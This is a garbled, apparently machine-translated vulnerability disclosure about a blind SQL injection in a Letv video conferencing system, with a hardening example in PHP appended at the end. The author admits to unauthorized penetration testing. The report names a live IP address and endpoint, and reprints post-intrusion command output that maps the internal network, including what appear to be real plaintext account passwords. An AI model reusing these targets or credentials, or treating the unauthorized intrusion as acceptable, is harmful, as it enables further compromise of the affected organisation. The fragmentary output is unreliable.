Levision video conferencing system: SQL injection leads to a shell and intranet access.
A blind SQL injection exists in the letv video conferencing system. An attacker can use it to write a shell directly.
It seems that this meeting system has just been launched?
In the current environment, you can access the Intranet. You only need to obtain the internal network segment.
In addition, I have not done any other actions. I will delete the webshell myself. If it is inconvenient for management, please forgive me. The penetration testing was carried out without your authorization. Please include more information; I just hope to help you solve some problems.
SQL Injection address:
http://115.182.51.182:8090//web/dept.php
[03:56:45] [INFO] the back-end DBMS is MySQL
Web server operating system: Windows
Web application technology: PHP 5.2.6, Apache 2.2.8
Back-end DBMS: MySQL 4.1
C:\> ipconfig /all
Windows IP configuration
Host Name ......: WIN-SKTH4MFTLEV
Primary DNS suffix ...........:
Node Type ......: Hybrid
IP Route enabled...
WINS proxy enabled...: No
Local Ethernet Adapter connection:
Connection to a specific DNS suffix .......:
Description ......: Intel (R) PRO/1000 MT Network Connection
Physical address ......: 00-50-56-89-1A-20
DHCP is enabled... no
Automatic configuration is enabled... yes
Local IPv6 address ......: fe80: 6df0: 6624: a50a: ebed % 11 (preferred)
IPv4 address ......: 115.182.51.182 (preferred)
Subnet Mask ......: 255.255.255.0
Default Gateway ......: 115.182.51.1
DHCPv6 IAID ......: 234901590
DHCPv6 client DUID ......: 00-01-00-01-17-01-F0-95-00-50-56-89-1A-20
DNS server ......: 219.141.136.10
219.141.140.10
NetBIOS on TCPIP...: Enabled
Tunnel adapter isatap. {E8BF1C9C-D390-4948-95D5-745DC82A29AB }:
Media status ......: the media has been disconnected.
Connection to a specific DNS suffix .......:
Description ......: Microsoft ISATAP Adapter
Physical address...
DHCP is enabled... no
Automatic configuration is enabled... yes
Tunnel adapter Teredo Tunneling Pseudo-Interface:
Connection to a specific DNS suffix .......:
Description ......: Teredo Tunneling Pseudo-Interface
Physical address...
DHCP is enabled... no
Automatic configuration is enabled... yes
IPv6 address ......: 2001: 0: 9d38: 90d7: 244c: 28e2: 8c49: cc49 (preferred)
Local IPv6 address ......: fe80: 244c: 28e2: 8c49: cc49 % 13 (preferred)
Default Gateway .............:
NetBIOS on TCPIP...: Disabled
Tunnel Adapter 6TO4 Adapter:
Connection to a specific DNS suffix .......:
Description ......: Microsoft 6to4 Adapter
Physical address...
DHCP is enabled... no
Automatic configuration is enabled... yes
IPv6 address ......: 2002: 73b6: 33b6: 73b6: 33b6: 33b6: 33b6 (preferred)
Default Gateway ........: 2002: c058: 6301: c058: 6301
DNS server ......: 219.141.136.10
219.141.140.10
NetBIOS on TCPIP...: Disabled
C:\> net view
Server Name Annotation
-------------------------------------------------------------------------------
\\LETV letv server (Samba, Ubuntu)
\\SVCTAG-BSDNK2X
\\WIN-496RU2U6F1F
\\WIN-SKTH4MFTLEV
The command is successfully completed.
C:\> net user
\ User Account
-------------------------------------------------------------------------------
Administrator
Mask Region
*****nx*****
Ian duhaibin
Guest liguotao
The command has been run, but one or more errors have occurred.
C:\> query user
User name session name ID status idle time Logon Time
C
Mask Region
*****xu*****
Ian 2 disconnection 27 + 15: 38
L
Mask Region
*****ot*****
O 3 disconnect 1 + 08: 57
Administrator 4 disconnected 6 + 17: 04
WIN-SKTH4MFTLEV \ c
Mask Region
*****eji*****
: Letv123! @#
WIN-SKTH4MFTLEV \
Mask Region
*****uo*****
: Letv123! @#
WIN-SKTH4MFTLEV \ Administrator: letv123! @#
vi /etc/sysconfig/network-scripts/ifcfg-eth0
service network restart
Calvin
TVLE800G
Mask: 255.255.255.128
Gateway: 113.6.235.1
CDN-HLJ-HEB-CNC-
Solution:
Filter
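What "Filter" can look like for an endpoint such as dept.php on the stack shown above (PHP 5.2.6, MySQL 4.1), as an added example that is not code from the original report or from the vendor. The `id` parameter, the `dept` table and its columns, and the connection settings are assumptions made for illustration.

```php
<?php
// Added example: hardened lookup for a dept.php-style endpoint.
// Hypothetical: the `id` parameter, the `dept` table and its columns, and
// the connection settings are assumptions, not taken from the report.

// Vulnerable pattern, for contrast: request input concatenated into SQL.
//   $sql = "SELECT id, name FROM dept WHERE id = " . $_GET['id'];

// Accept only a short decimal integer; anything else returns null.
function parse_dept_id($raw)
{
    // \z (not $) so a trailing newline is rejected; arrays fail is_string().
    if (!is_string($raw) || !preg_match('/^[0-9]{1,9}\z/', $raw)) {
        return null;
    }
    return (int) $raw;
}

// Look up one row with a prepared statement; the value never enters the SQL text.
function find_dept($db, $id)
{
    $stmt = $db->prepare('SELECT id, name FROM dept WHERE id = ?');
    if ($stmt === false) {
        return null;
    }
    $stmt->bind_param('i', $id);
    $stmt->execute();
    // bind_result() rather than get_result(): works without mysqlnd,
    // which matters on old PHP 5.x builds like the 5.2.6 in the report.
    $stmt->bind_result($rowId, $rowName);
    $row = $stmt->fetch() ? array('id' => $rowId, 'name' => $rowName) : null;
    $stmt->close();
    return $row;
}

$id = parse_dept_id(isset($_GET['id']) ? $_GET['id'] : null);
if ($id === null) {
    header('HTTP/1.1 400 Bad Request');
    exit('Invalid department id');
}
// Connect as an account limited to SELECT on this schema. Without the
// MySQL FILE privilege a missed injection cannot write files to disk.
$db = new mysqli('127.0.0.1', 'conf_ro', 'CHANGE_ME', 'conference');
if (mysqli_connect_errno()) {
    header('HTTP/1.1 500 Internal Server Error');
    exit('Database unavailable');
}
$row = find_dept($db, $id);
echo $row ? htmlspecialchars($row['name'], ENT_QUOTES) : 'Not found';
```

The input check and the prepared statement close the injection itself; the restricted database account limits what a missed injection elsewhere in the application could do.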